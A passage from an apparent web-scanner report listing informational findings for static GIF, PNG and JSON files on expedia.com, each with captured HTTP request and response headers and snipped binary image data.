Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1348-1317080324131"
Last-Modified: Mon, 26 Sep 2011 23:38:44 GMT
Content-Length: 1348
Date: Mon, 03 Oct 2011 00:13:11 GMT
Connection: close

GIF89ab........9..L.._.._..r..L...........
..'...............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61
...[SNIP]...
29.22. http://www.expedia.com/static/default/default/images/infosite/rooms_left_middle.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/rooms_left_middle.gif

Request

GET /static/default/default/images/infosite/rooms_left_middle.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1096-1317080311412"
Last-Modified: Mon, 26 Sep 2011 23:38:31 GMT
Content-Length: 1096
Date: Mon, 03 Oct 2011 00:13:14 GMT
Connection: close

GIF89a........f....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rd
...[SNIP]...
29.23. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/videoPlayLarge.gif

Request

GET /static/default/default/images/infosite/videoPlayLarge.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1275-1317085617344"
Last-Modified: Tue, 27 Sep 2011 01:06:57 GMT
Content-Length: 1275
Date: Mon, 03 Oct 2011 00:13:01 GMT
Connection: close

GIF89a-.-......i.f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
...[SNIP]...
29.24. http://www.expedia.com/static/default/default/stubs/adserver.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/stubs/adserver.json

Request

GET /static/default/default/stubs/adserver.json HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"51-1317080322800"
Last-Modified: Mon, 26 Sep 2011 23:38:42 GMT
Content-Length: 51
Date: Mon, 03 Oct 2011 00:10:55 GMT
Connection: close

{ url: 'http://www.tripadvisor.com/HotelLander' }
29.25. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/buttonBG.png

Request

GET /static/fusion/v2.3/images/buttonBG.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"883-1317085625464"
Last-Modified: Tue, 27 Sep 2011 01:07:05 GMT
Content-Length: 883
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

.PNG
.
...IHDR... ...S.....P.......sRGB.........PLTE.....i.......2X.5].....f..9.....1.-O.....m.7J.........F...3Y.......5\.......0T..P.4Z.4\.7O.......7N.8R.....Q..3..9..=..Y...........b.4[....8O....8
...[SNIP]...
29.26. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

Request

GET /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"4221-1317085625006"
Last-Modified: Tue, 27 Sep 2011 01:07:05 GMT
Content-Length: 4221
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

.PNG
.
...IHDR.............7.c2....gAMA......a.....PLTE...333.5]......................................................................................................................................
...[SNIP]...
29.27. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/iconsSprites.png

Request

GET /static/fusion/v2.3/images/iconsSprites.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"6824-1317085613547"
Last-Modified: Tue, 27 Sep 2011 01:06:53 GMT
Content-Length: 6824
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

.PNG
.
...IHDR...i..........pi.....sRGB.........bKGD.............    pHYs.................tIME..... 0.......(IDATx..]k..Wu.zfvg.Z...^..^.e..%tG.%9.....G..    ........q...!...
.r......"......d.p$.b.....,y%
...[SNIP]...
29.28. http://www.expedia.com/static/fusion/v2.3/images/progressAnim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/progressAnim.gif

Request

GET /static/fusion/v2.3/images/progressAnim.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; JSESSION=965e7753-b813-4f22-a4ce-feaa1b098dbb; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1651-1317085619476"
Last-Modified: Tue, 27 Sep 2011 01:06:59 GMT
Content-Length: 1651
Date: Mon, 03 Oct 2011 00:09:40 GMT
Connection: close

GIF89aS..................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/
...[SNIP]...
29.29. https://www.expedia.com/static/default/default/eta/commonIcons.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/eta/commonIcons.gif

Request

GET /static/default/default/eta/commonIcons.gif HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"2287-1317080315836"
Last-Modified: Mon, 26 Sep 2011 23:38:35 GMT
Content-Length: 2287
Date: Mon, 03 Oct 2011 01:02:56 GMT
Connection: keep-alive

GIF89a..X..U.....f.3f.I...........Ky....P}.................)..........o\Vg......r....O8......Hu............................D+...t...j.Z..l....6[..:k.T}.x........t....6.V@...............i~...........
...[SNIP]...
29.30. https://www.expedia.com/static/default/default/images/bpg/BPG_logo_US.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/images/bpg/BPG_logo_US.gif

Request

GET /static/default/default/images/bpg/BPG_logo_US.gif HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"993-1317085618048"
Last-Modified: Tue, 27 Sep 2011 01:06:58 GMT
Content-Length: 993
Date: Mon, 03 Oct 2011 01:02:55 GMT
Connection: keep-alive

GIF89ad.......Oq.Cg......[u.j.....=\{......y........j....................Lh.....6]...........................!.......,....d..........u5..Xl.Nf|U]..m.    E......    l    IN.0..... 0M....pp.,    B.".dc..%.S[..W@.V
...[SNIP]...
29.31. https://www.expedia.com/static/default/default/images/creditcard.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/images/creditcard.gif

Request

GET /static/default/default/images/creditcard.gif HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"2695-1317085580923"
Last-Modified: Tue, 27 Sep 2011 01:06:20 GMT
Content-Length: 2695
Date: Mon, 03 Oct 2011 01:02:51 GMT
Connection: keep-alive

GIF89aZ.9....Tegq........fyz.......vx..0...Mbd........(....Or..............F...V.l..CBXZ.EN.......x........WY^rs.~-...{..I^`zOU......m}.......:BVjl......kZ_......XuH..............nemc}...+6....V...Q
...[SNIP]...
29.32. https://www.expedia.com/static/default/default/images/popup_bottom_notch.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/images/popup_bottom_notch.gif

Request

GET /static/default/default/images/popup_bottom_notch.gif HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"131-1317080309140"
Last-Modified: Mon, 26 Sep 2011 23:38:29 GMT
Content-Length: 131
Date: Mon, 03 Oct 2011 01:02:55 GMT
Connection: keep-alive

GIF89a........33.3f.ff...............!.......,..........H(1....9A.......euY..D:)...pX........|.'.o.(M.B...LR....T3..H"...]..-x.N..;
29.33. https://www.expedia.com/static/default/default/images/progressbar.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/images/progressbar.gif

Request

GET /static/default/default/images/progressbar.gif HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
